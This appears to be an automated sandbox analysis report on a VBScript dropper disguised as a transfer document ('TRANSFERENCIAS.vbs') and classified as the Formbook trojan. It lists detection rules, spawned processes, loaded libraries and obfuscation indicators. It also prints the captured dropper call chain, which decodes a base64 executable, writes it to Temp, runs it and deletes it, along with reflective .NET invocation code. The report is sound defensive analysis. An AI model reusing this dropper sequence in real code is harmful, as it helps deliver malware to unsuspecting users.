Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@7/2@1/1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Mutant created: NULL
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user~1\AppData\Local\Temp\temp_executable.exe Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.1324624644.000002387ED7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318550574.000002387ED7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1319390729.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318437273.000002387EA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1324207380.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318568461.000002387EA8C000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAEaw9OcAAAAAAAAAAOAALgELAQYAAMoAAAAKAAAAAAAALug");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe")
.NET source code contains method to dynamically call methods (often used by packers)
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Binary contains a suspicious time stamp
Source: temp_executable.exe.0.dr Static PE information: 0xE7F4B046 [Sun Apr 26 08:26:46 2093 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004030E0 push eax; ret 10_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0041488D pushfd ; iretd 10_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00401966 push esi; iretd 10_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00402179 push ss; retf 10_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0041F1A0 push ss; ret 10_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040D4C7 push edx; ret 10_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040D4CD push edx; ret 10_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00418DD0 push ebp; ret 10_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040D589 push edx; ret 10_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004116BB push edi; retf 10_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0042373B push es; ret 10_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00413FC3 push edi; ret 10_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004237B1 push es; ret 10_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF09AD push ecx; mov dword ptr [esp], ecx 10_2_02EF09B6
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
